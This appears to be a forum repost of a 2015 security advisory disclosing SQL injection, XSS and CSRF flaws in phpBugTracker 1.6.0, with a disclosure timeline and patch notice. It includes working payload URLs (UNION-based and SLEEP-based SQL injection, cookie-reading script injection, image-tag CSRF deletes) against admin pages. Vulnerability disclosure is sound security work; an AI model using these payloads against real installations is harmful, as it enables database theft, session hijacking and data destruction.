Jump to content
Aerosol

phpBugTracker 1.6.0 - Multiple Vulnerabilities

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted 

Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in
phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16
Author: Steffen Rösemann
Affected Software: phpBugTracker v.1.6.0
Vendor URL: https://github.com/a-v-k/phpBugTracker
Vendor Status: patched
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31

==========================
Vulnerability Description:
==========================

The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,
stored/reflected XSS- and CSRF-vulnerabilities.

==================
Technical Details:
==================

The following files used in a common phpBugTracker installation suffer from
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:

===========
project.php
===========

SQL injection / underlaying CSRF vulnerability  in project.php via id
parameter:

http://
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+

Stored XSS via input field "project name":

http://{TARGET}/admin/project.php?op=add

executed in: e.g. http://{TARGET}/admin/project.php, http://
{TARGET}/index.php


========
user.php
========

Reflecting XSS in user.php via use_js parameter:

http://
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1

executed in: same page


=========
group.php
=========

Reflecting XSS in group.php via use_js parameter:

http://
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1

executed in: same page

(Blind) SQL Injection / underlaying CSRF vulnerability  in group.php via
group_id parameter (used in different operations):

http://
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+


==========
status.php
==========

SQL injection / underlaying CSRF vulnerability  in status.php via status_id
parameter:

http://
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

Stored XSS via input field "Description":

http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0

executed in: e.g. http://{TARGET}/admin/status.php

CSRF vulnerability in status.php (delete statuses):

<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"



==============
resolution.php
==============

SQL injection / underlaying CSRF vulnerability  in resolution.php via
resolution_id parameter:

http://
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in resolution.php (delete resolutions):

<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"



============
severity.php
============

SQL injection / underlaying CSRF vulnerability  in severity.php via
severity_id parameter:

http://
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+

CSRF vulnerability in severity.php (delete severities):

<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"


Stored XSS in severity.php via input field "Description":

http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0

executed in: e.g. http://{TARGET}/admin/severity.php


============
priority.php
============

SQL injection / underlaying CSRF vulnerability in priority.php via
priority_id parameter:

http://
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+


======
os.php
======

SQL Injection / underlaying CSRF vulnerability in os.php via os_id
parameter:

http://
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+

CSRF vulnerability in os.php (delete operating systems):

<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >

Stored XSS vulnerability in os.php via input field "Regex":

http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0

executed in: e.g. http://{TARGET}/admin/os.php?


============
database.php
============

SQL injection / underlaying CSRF vulnerability in database.php via
database_id:

http://
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+

CSRF vulnerability in database.php (delete databases):

<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"


Stored XSS vulnerability in database.php via input field "Name":

http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0


========
site.php
========

CSRF vulnerability in site.php (delete sites):

<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >

SQL injection / underlaying CSRF vulnerability in site.php via site_id
parameter:

http://
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+


=======
bug.php
=======

This issue has already been assigned CVE-2004-1519, but seems to have not
been corrected since the assignment:

SQL injection / underlaying CSRF vulnerability in bug.php via project
parameter:

http://
{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+

For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.



=========
Solution:
=========

Update to version 1.7.0.


====================
Disclosure Timeline:
====================
03/05-Feb-2015 – found the vulnerabilities
05-Feb-2015 - informed the developers (see [3])
05-Feb-2015 – release date of this security advisory [without technical
details]
05-Feb-2015 - forked the Github repository, to keep it available for other
security researchers (see [4])
05/06-Feb-2015 - vendor replied, will provide a patch for the
vulnerabilities
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical
details will be released on 19th February 2015
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - send to FullDisclosure


========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker

Source

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...